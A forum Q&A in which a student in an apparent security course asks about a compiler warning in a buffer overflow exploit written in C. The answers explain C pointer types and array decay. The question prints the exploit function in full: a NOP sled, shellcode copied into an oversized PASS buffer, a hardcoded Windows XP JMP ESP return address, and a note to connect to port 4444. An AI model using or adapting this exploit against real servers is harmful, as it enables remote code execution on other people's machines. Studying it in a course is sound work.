In a course I'm taking, I was given a broken buffer overflow script written in C, and have to fix the broken coding. I've patched a few things so far, but am receiving this error message when trying to compile it (the error showed up from the initial code, not from anything I edited):
    646-fixed.c: In function ‘exploit’:
    646-fixed.c:48: warning: assignment from incompatible pointer type
Below is the function where the error is occurring. I'm not very familiar with C - but from the responses I received yesterday, I understand that this is happening due to ptr's type being int, & evil's type being char. What I don't understand is what I can do to fix this - can anybody help with this? You can also see the full script here
    void exploit(int sock) {
        FILE *test;
        int *ptr;
        char userbuf[] = "USER madivan\r\n";
        char evil[3001];
        char buf[3012];
        char receive[1024];
        char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
                         "\x90\x90\x90\x90\x90\x90\x90\x90";
        memset(buf, 0x00, 3012);
        memset(evil, 0x00, 3001);
        memset(evil, 0x43, 3000);
        ptr = &evil; // line 48
        ptr = ptr + 652; // 2608
        memcpy(ptr, &nopsled, 16);
        ptr = ptr + 4;
        memcpy(ptr, &shellcode, 317);
        *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP
        // banner
        recv(sock, receive, 200, 0);
        printf("[+] %s", receive);
        // user
        printf("[+] Sending Username...\n");
        send(sock, userbuf, strlen(userbuf), 0);
        recv(sock, receive, 200, 0);
        printf("[+] %s", receive);
        // passwd
        printf("[+] Sending Evil buffer...\n");
        sprintf(buf, "PASS %s\r\n", evil);
        //test = fopen("test.txt", "w");
        //fprintf(test, "%s", buf);
        //fclose(test);
        send(sock, buf, strlen(buf), 0);
        printf("[*] Done! Connect to the host on port 4444...\n\n");
    }
Note: I posted this yesterday providing only a few lines of the code, and as a result, couldn't get a clear answer - so I deleted it and am reposting it.
The type of &evil is pointer to length 3001 array of char, or char (*)[3001]. The type of ptr is pointer to int, or int*. Those types are incompatible. You can't assign one to the other.

What you probably need is a pointer to the first element of evil. You can use a pointer to char, i.e. char*, and assign evil to it:

Here, evil decays to a pointer to the first element of the array, so the assignment works. This is equivalent to assigning the address of the first element:
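The pointer types the answer describes, as an added example that is not the answerer's or the course's code (all function names here are hypothetical). It also shows that pointer arithmetic scales by the pointed-to type, so the same number added to an int* and to a char* lands at different byte offsets, and it includes a bounds-checked copy through a char*.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define EVIL_LEN 3001 /* same size as evil[] in the question */

/* Bytes actually skipped by `p + n` when p is an int* (n must be <= 1024). */
size_t int_ptr_step_bytes(size_t n) {
    static int cells[1024];
    int *p = cells;
    return (size_t)((char *)(p + n) - (char *)p);
}

/* Bytes skipped by `p + 1` when p has the type of &evil, char (*)[3001]. */
size_t array_ptr_step_bytes(void) {
    static char evil[EVIL_LEN];
    char (*p)[EVIL_LEN] = &evil; /* compatible types: no warning */
    return (size_t)((char *)(p + 1) - (char *)p);
}

/* 1 if the decayed array name and &evil[0] are the same char* value. */
int decay_matches_first_element(void) {
    static char evil[EVIL_LEN];
    char *a = evil;     /* array decays to pointer to its first element */
    char *b = &evil[0]; /* explicit address of the first element */
    return a == b;
}

/* Copy n bytes to byte offset off through a char*, refusing to leave dst. */
int copy_at(char *dst, size_t dst_len, size_t off, const void *src, size_t n) {
    if (off > dst_len || n > dst_len - off)
        return -1;
    memcpy(dst + off, src, n);
    return 0;
}

int main(void) {
    printf("int* + 652 skips %zu bytes\n", int_ptr_step_bytes(652));
    printf("&evil + 1 skips %zu bytes\n", array_ptr_step_bytes());
    printf("evil == &evil[0]: %d\n", decay_matches_first_element());
    return 0;
}
```

With a 4-byte int, the first line reports 2608 bytes, which is the figure in the question's `// 2608` comment; on a char* the same distance has to be written as a byte count.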